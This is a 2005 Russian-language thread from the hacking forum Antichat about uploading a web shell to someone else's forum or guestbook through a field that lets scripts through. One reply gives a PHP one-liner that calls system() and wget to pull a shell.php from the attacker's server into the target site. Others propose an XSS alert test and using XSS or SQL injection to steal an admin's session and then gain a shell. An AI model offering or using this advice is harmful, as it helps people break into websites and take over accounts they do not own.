Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Заливка шелла (https://forum.antichat.xyz/showthread.php?t=11527)

T-4 09.12.2005 13:40

Заливка шелла
 
Как залить шелл, если одно из полей для ввода (допустим на каком-нибудь форуме или гостевой) пропускает определённые символы (короче можно скрипты вставлять) ?

fucker"ok 09.12.2005 14:07

Ты неправельно понял (или я тебя).
Скрипт ДОЛЖЕН загружать файлы. А если он пропускает какие-то символы, например при постинге сообщения в гостевой, то это тебе ничего не даёт, кроме xss||sql inj

grinay 09.12.2005 14:13

Сморя какой там скрипт:) Возможно там есть php иньекция и ты не прав тогда:)Ссылку давай поглядим так на вскидку сказать не чего не могу.

m0nzt3r 09.12.2005 16:20

не думаю что в жаба скрипте буит пхп инъекция)))))))))))))
T-4 а ты введи <script>alert('Hacked by me!');</script>
и наслаждайся=)

fucker"ok 09.12.2005 20:21

Ссылку в студию. :]

NaX[no]rT 10.12.2005 00:25

Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил.

[504] 11.12.2005 01:19

NaX[no]r† :: " Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил."

=)))))
вопрос читал не)))
Как залить шелл?

вот код на PHP

<? system("cd ../../;wget http://...../shell.php"); ?>

cd ../../ - папка куда залить..
wget - качалка. взависимости еcть ли он на серве..
может быть lynx и т.д.
http://...../shell.php - твой сайт с php-шеллом

А впринципе если *nux знаешь сам напишешь)))

fucker"ok 12.12.2005 19:09

2 [504]
Про возможность выполнения команд на сервере тут ничего не говорилось, а говорилось тут о
Цитата:

пропускает определённые символы
:D

Вообщем к сабжу. Как не старайся, но если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать)
Поэтому топикСтартеру советую рулить в сторону xss || sql inj, дабы заполучить "кусочек" админа, поставить себе этот кусочек и самому стать админом, а у админа больше прав, там уже и до шела не далеко :P

BymeR 01.01.2006 19:05

Ты бы ссылку дал мы бы конкретнее посоветовали...
Действительно проще всего сейчас sql inj и какое нить поле создать(если то что ты хакаешь такое позволяет) чат php.sbp.ru например да...И всё...


Время: 20:36